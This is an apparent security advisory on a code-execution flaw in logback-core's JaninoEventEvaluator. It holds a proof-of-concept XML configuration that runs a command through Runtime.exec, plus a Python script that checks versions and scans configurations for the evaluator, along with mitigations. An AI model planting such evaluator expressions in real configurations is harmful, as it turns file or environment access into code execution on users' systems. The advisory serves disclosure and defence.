A critical Arbitrary Code Execution (ACE) vulnerability has been found in JaninoEventEvaluator, an extension of logback, a popular logging library for Java applications. The vulnerability is present in QOS.CH logback-core from version 0.1 up to and including 1.3.14, and from 1.4.0 up to and including 1.5.12. It allows an attacker to execute arbitrary code in the context of the application by compromising an existing logback configuration file, or by injecting an environment variable before program execution so that the application loads a configuration file under the attacker's control.

Vulnerability Details

The JaninoEventEvaluator extension compiles the Java expression given in the configuration file with Janino and runs it against logging events, so a malicious logback configuration file yields arbitrary code execution. To mount the attack, the attacker must have write access to a configuration file that the application loads. Alternatively, the attacker can inject a malicious environment variable (or startup property) that points the application at a configuration file the attacker controls. In both scenarios the attack requires existing privilege on the host: this is a way to turn file-write or environment control into code execution as the application user, not a remote entry point.

The following configuration snippet demonstrates the vulnerability:

<configuration>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder>
      <pattern>%msg%n</pattern>
    </encoder>

    <!-- Named evaluator: the expression body is compiled by Janino and run as Java code -->
    <evaluator name="arbitraryCode" class="ch.qos.logback.core.boolex.JaninoEventEvaluator">
      <expression><![CDATA[
        boolean a = true;
        "".getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec("calc.exe");
        return a;
      ]]></expression>
    </evaluator>

    <!-- The filter references the evaluator by name; every logging event that reaches
         this appender is passed to the expression above -->
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator>arbitraryCode</evaluator>
      <onMismatch>DENY</onMismatch>
    </filter>
  </appender>

  <!-- Root logger and closing tag were missing from the original snippet; added so the
       configuration is complete and logging events actually reach the filter -->
  <root level="DEBUG">
    <appender-ref ref="STDOUT" />
  </root>
</configuration>

In this example, the expression is compiled when the logback configuration file is loaded and executed the first time a logging event reaches the filter, at which point the attacker's payload (here, launching calc.exe) runs with the privileges of the application process.

To mitigate this vulnerability, users are advised to:

1. Update logback-core to a fixed release (the advisory lists 1.3.15-alpha4 or 1.5.13-alpha4; use those versions or later) from the official website (https://logback.qos.ch/).
2. Restrict access to logback configuration files so that only authorized users have write permissions, and audit existing configuration files for JaninoEventEvaluator definitions that nobody intended to be there.
3. Control the environment in which the JVM starts: the configuration file path can be overridden at startup (for example via the logback.configurationFile system property), so untrusted users must not be able to set such values for a privileged process.
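As an added triage aid (this is example code, not code from the logback project or from this advisory), the following Python script performs the two checks a practitioner would run on an affected host or build: it classifies a logback-core version string against the affected ranges stated above, and it scans a logback XML configuration for JaninoEventEvaluator definitions, reporting the expression text that Janino would compile. The two sample configurations are constructed for illustration; the handling of pre-release suffixes (only the numeric part of the version is compared) is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges from the advisory: 0.1 .. 1.3.14 and 1.4.0 .. 1.5.12 (inclusive).
AFFECTED_RANGES = [((0, 1, 0), (1, 3, 14)), ((1, 4, 0), (1, 5, 12))]

# Fully qualified class names under which the evaluator is configured (core and classic).
JANINO_CLASSES = {
    "ch.qos.logback.core.boolex.JaninoEventEvaluator",
    "ch.qos.logback.classic.boolex.JaninoEventEvaluator",
}


def parse_version(version):
    """Return (major, minor, patch) for a logback version string such as '1.5.12'.

    A pre-release suffix such as '-alpha4' is ignored (assumption: the numeric
    part alone decides, matching the ranges as the advisory states them).
    """
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError("unrecognised logback version: %r" % version)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version):
    """True if logback-core `version` falls inside an affected range."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def find_janino_evaluators(config_xml):
    """Scan a logback XML configuration for JaninoEventEvaluator definitions.

    Returns one dict per definition: evaluator name (if any), class attribute and
    the expression text Janino would compile. An <evaluator> element is reported
    when its class is a Janino evaluator or when it carries an <expression> child
    (in logback-classic a class-less evaluator defaults to JaninoEventEvaluator).
    A bare name reference such as <evaluator>arbitraryCode</evaluator> inside a
    filter is not a definition and is skipped.
    """
    root = ET.fromstring(config_xml)
    hits = []
    for ev in root.iter("evaluator"):
        cls = ev.get("class", "")
        expr = ev.find("expression")
        if cls in JANINO_CLASSES or expr is not None:
            hits.append({
                "name": ev.get("name"),
                "class": cls or "(default)",
                "expression": (expr.text or "").strip() if expr is not None else "",
            })
    return hits


# Constructed sample: mirrors the shape of the advisory's proof of concept, with the
# command string replaced by a placeholder; the finding is the Janino evaluator itself.
SUSPICIOUS_CONFIG = '''<configuration>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder><pattern>%msg%n</pattern></encoder>
    <evaluator name="arbitraryCode" class="ch.qos.logback.core.boolex.JaninoEventEvaluator">
      <expression><![CDATA[
        "".getClass().forName("java.lang.Runtime").getMethod("getRuntime", null)
            .invoke(null, null).exec("PLACEHOLDER");
        return true;
      ]]></expression>
    </evaluator>
    <filter class="ch.qos.logback.core.filter.EvaluatorFilter">
      <evaluator>arbitraryCode</evaluator>
      <onMismatch>DENY</onMismatch>
    </filter>
  </appender>
  <root level="DEBUG"><appender-ref ref="STDOUT"/></root>
</configuration>'''

# Constructed sample: a configuration that filters by level and has no Janino evaluator.
BENIGN_CONFIG = '''<configuration>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <filter class="ch.qos.logback.classic.filter.ThresholdFilter"><level>INFO</level></filter>
    <encoder><pattern>%msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>'''


def report(version, config_xml):
    """Combine both checks into one verdict string for a host or build artifact."""
    verdict = "AFFECTED" if is_affected(version) else "not affected"
    lines = ["logback-core %s: %s" % (version, verdict)]
    for h in find_janino_evaluators(config_xml):
        first = h["expression"].splitlines()[0] if h["expression"] else ""
        lines.append("Janino evaluator %r (%s): %s" % (h["name"], h["class"], first))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report("1.5.12", SUSPICIOUS_CONFIG))
    print(report("1.5.13-alpha4", BENIGN_CONFIG))
```

Run the scanner over every logback.xml, logback-test.xml and any file named by the logback.configurationFile startup property; a Janino evaluator that nobody on the team can account for is the indicator to chase, regardless of whether the version check says the library is patched, because the patched releases change how the extension is enabled rather than removing the ability to run configured Java code.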

References

1. QOS.CH - Logback: The Generic, Reliable, Fast, and Flexible Logging Framework for Java - https://logback.qos.ch/
2. GitHub Issue - JaninoEventEvaluator: arbitrary code execution through logback configuration - https://github.com/qos-ch/logback/issues/880
3. Logback Reference Manual - JaninoEventEvaluator - https://logback.qos.ch/manual/filters.html#JaninoEventEvaluator

Conclusion

This critical ACE vulnerability in the JaninoEventEvaluator poses a severe risk to Java applications running the affected logback-core versions. Users are strongly encouraged to update logback-core to a fixed release (1.3.15-alpha4 or 1.5.13-alpha4, or later), to restrict write access to logback configuration files, and to validate the environment variables and startup properties that determine which configuration file is loaded, in order to minimize the risk of a successful attack.

Timeline

Published on: 12/19/2024 16:15:07 UTC
Last modified on: 01/03/2025 14:15:24 UTC